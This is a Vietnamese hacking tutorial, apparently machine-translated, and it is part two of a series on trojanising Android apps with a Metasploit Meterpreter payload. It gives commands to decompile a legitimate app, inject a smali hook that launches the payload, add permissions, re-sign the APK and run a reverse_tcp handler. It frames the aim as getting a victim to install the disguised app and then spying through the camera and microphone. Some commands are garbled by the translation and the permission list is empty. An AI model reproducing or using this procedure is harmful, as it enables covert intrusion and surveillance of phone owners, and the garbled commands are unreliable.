Hack bất kỳ Android qua Internet sử dụng Metasploit Phần: 2  

Hacking Android với Metasploit!

Chúng tôi đã thảo luận cách tạo tải trọng Metasploit và cách định cấu hình Linux của bạn thành tài khoản NOIP cho DDNS trong Phần đầu tiên của loạt bài này

Trong phần thứ hai này và phần cuối cùng, chúng ta sẽ làm Hooking nút metasploit và nhúng tải trọng bên trong Ứng dụng Android. (Các ứng dụng ưa thích của bạn như Facebook hoặc Gmail hoặc bất kỳ trò chơi nào)

Vì điều đó chúng tôi yêu cầu:

  • APKTOOL công cụ kỹ thuật đảo ngược Android

Bạn có thể cài đặt apktool dễ dàng bằng cách gõ lệnh này trên thiết bị đầu cuối (Apktool đi kèm với hệ điều hành Kali-Linux)

sudo apt-get cài đặt apktool

  • Jarsigner để ký điện tử Ứng dụng android với chứng chỉ giả mạo

Tải xuống các tệp cần thiết cho jarsigner từ kho lưu trữ GitHub của chúng tôi
OneClicksigner

Vì vậy, bây giờ tất cả những gì chúng ta phải làm là:

1. Tạo tải trọng Meterpreter

2.Dịch chuyển tải trọng và gói ứng dụng gốc

3.Sao chép các tệp tải trọng vào gói ứng dụng gốc

4. Đưa móc vào hoạt động thích hợp của gói ứng dụng gốc

5.Tắt quyền trong tệp AndroidManifest.xml

6.Re-biên dịch apk gốc

7.Đăng ký apk bằng cách sử dụng Jarsigner

Chúng tôi đã thực hiện với việc tạo ra tải trọng Metasploit ở phần cuối.

Vì vậy, chúng ta sẽ tiếp tục

Bước thứ hai

Biên dịch lại tải trọng và bạn muốn tệp APK mà bạn muốn đặt trọng tải của mình:


Lệnh dịch ngược apktool như sau

apktool d -f -o tải trọng /root/meterpreter.apk
apktool d -f -o gốc /root/original_app_name.apk

Sau khi khen quá trình này sẽ có 2 thư mục ở thư mục gốc chứa tập tin tải trọng msf và một thư mục khác của gói ứng dụng gốc sẽ được ràng buộc bởi tải trọng.

Bước thứ ba

Sao chép Tệp từ Tải trọng apk xuống apk gốc:

Vì vậy, mở tập tin AndroidManifest.xml nằm bên trong thư mục “ / root / original ” bằng bất kỳ trình soạn thảo văn bản nào.

Nếu bạn biết HTML, thì tệp này sẽ trông quen thuộc với bạn. Cả hai đều về cơ bản là Ngôn ngữ đánh dấu và cả hai đều sử dụng cấu trúc thuộc tính và thẻ quen thuộc, ví dụ: Nội dung . Dù sao, hãy tìm một thẻ chứa cả hai dòng -


Bước bốn

Tiêm móc vào hoạt động thích hợp của gói ứng dụng gốc

Trên ghi chú bên, bạn có thể sử dụng CTRL + F để tìm kiếm trong tài liệu trong bất kỳ trình soạn thảo văn bản GUI nào. Khi bạn định vị hoạt động đó, hãy lưu ý giá trị của thuộc tính “android: name”

Hai dòng chúng tôi tìm kiếm cho thấy đây là hoạt động sắp bắt đầu khi chúng tôi khởi chạy ứng dụng từ biểu tượng trình khởi chạy và đây cũng là hoạt động CHÍNH tương tự như chức năng 'chính' trong lập trình truyền thống.

Bây giờ chúng ta có tên của hoạt động mà chúng ta muốn tiêm móc vào, hãy bắt đầu với nó! Trước hết, hãy mở mã .smali của hoạt động đó bằng cách sử dụng trình chỉnh sửa văn bản. Chỉ cần mở một thiết bị đầu cuối và loại -

gedit / root / original / smali / Activity_Path

Thay thế Activity_Path bằng " android: name " của hoạt động, nhưng thay vì dấu chấm, hãy nhập dấu gạch chéo. Trên thực tế, các mã smali được lưu trữ trong các thư mục có tên theo định dạng “ android: name ”, chúng ta có thể dễ dàng lấy vị trí của mã .smali theo cách chúng ta đã làm.

Sau đó tìm kiếm dòng sau trong mã smali bằng CTRL + F -

; -> onCreate (Landroid / os / Bundle;) V

Khi bạn nhận được thay đổi đó toàn bộ dòng này

gọi tĩnh {p0}, Lcom / metasploit / giai đoạn / Tải trọng; -> bắt đầu (Landroid / content / Context;) V

Khi mainactivity thực hiện dòng này điều gì xảy ra là ứng dụng thực thi hoạt động chính của ứng dụng với tải trọng metasploit.

Vì vậy, chúng tôi có thể có được vỏ đồng hồ đo trong bảng điều khiển của chúng tôi.

Bước năm

Tiêm quyền trong tệp AndroidManifest.xml

Bây giờ tất cả chúng ta đã được thiết lập nhưng chúng ta phải cho phép cần thiết hoặc sự cho phép bổ sung để có toàn quyền kiểm soát thiết bị Android cho rằng chúng ta đã chỉnh sửa tệp xml tệp kê khai android
tệp XML trông giống như HTML dễ thao tác tệp.

Vui lòng sao chép văn bản này và đặt nó trong khu vực được chỉ định sau thẻ với thẻ khác nhưng không tạo các dòng thừa:

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Bước sáu

Biên dịch lại gói ứng dụng gốc

Sau khi lưu tệp XML, chúng tôi đã đi để biên dịch lại tệp để được nhúng với tệp .apk.

apktool b / root / gốc

Bây giờ tập tin apk gốc đã sẵn sàng!

Bước bảy

Ký apk bằng cách sử dụng Jarsigner

Android yêu cầu tất cả các ứng dụng phải được ký điện tử với chứng chỉ trước khi chúng có thể được cài đặt. Ứng dụng (Android) sử dụng chứng chỉ này để xác định tác giả của ứng dụng và chứng chỉ không cần phải được ký bởi tổ chức phát hành chứng chỉ. Các ứng dụng Android thường sử dụng chứng chỉ tự ký. Nhà phát triển ứng dụng giữ khóa riêng của chứng chỉ.

Trong trường hợp này, chúng ta sẽ ký apk bằng cách sử dụng khóa gỡ lỗi android mặc định. Chỉ cần chạy lệnh sau -

jarsigner -verbose -keystore ~ ​​/ .android / debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

Kho lưu trữ tệp và tất cả các tệp cần thiết trong tệp oncliksign.zip vui lòng tải xuống tệp này từ các liên kết sau

Tải xuống Link1

Tải xuống Link2

Bây giờ nếu bạn có thể khiến nạn nhân cài đặt và chạy ứng dụng trông rất hợp pháp này trong điện thoại của mình, bạn có thể nhận được một phiên làm việc meterpreter làm việc trên điện thoại của mình!

Chỉ cần mở lệnh giao diện điều khiển của bạn:

-> msfconsole
-> sử dụng đa / xử lý
-> đặt PAYLOAD android / meterpreter / reverse_tcp
-> đặt LHOST
-> đặt LPORT 4444
-> khai thác

Khi chỉ định PAYLOAD Vui lòng kiểm tra xem bạn đã đưa ra gì trong khi tạo PAYLOAD
phải giống nhau và để có được phiên đồng hồ báo thức cổng 4444 phải được CHUYỂN ĐỔI CẢNG từ bộ định tuyến của bạn / modem

Để thực hiện việc này, hãy truy cập cổng của bạn hoặc trang chủ của bộ định tuyến (Ví dụ: 192.168.1.1/home.html)

Ở đó bạn sẽ thấy tùy chọn Máy chủ ảo hoặc Chuyển tiếp cổng chỉ đặt tất cả chuyển tiếp cổng TCP hoạt động.

Nếu bạn sử dụng internet từ các điểm phát sóng di động Android, vui lòng tải xuống Ứng dụng cổng chuyển tiếp avilable trên Playstore.

Lợi nhuận từ Công cụ này là

Khi nạn nhân cài đặt ứng dụng trong điện thoại của mình, bạn sẽ nhận được phiên đồng hồ báo thức mở và bạn có thể thực hiện nhiều thao tác trên đó như chụp ảnh, ghi âm giọng nói check_root vv…

Chỉ cần nhập help khi bạn nhận được phiên đồng hồ thông tin có một số hoạt động sẽ được liệt kê!

Tôi hy vọng loạt game Metasploit hack điện thoại Android này rất hữu ích. 🙂

Nếu bạn có bất kỳ thắc mắc nào, vui lòng viết phần bình luận, chúng tôi sẽ giải quyết nó.

Cảm ơn bạn ..!

Lanwil DS (Đội ngũ nhân sự)

nguon https://www.hackeroyale.com/hack-android-using-metasploit-2/

Source link

Đưa ra một phản hồi

Vui lòng nhập bình luận của bạn!
Vui lòng nhập tên của bạn ở đây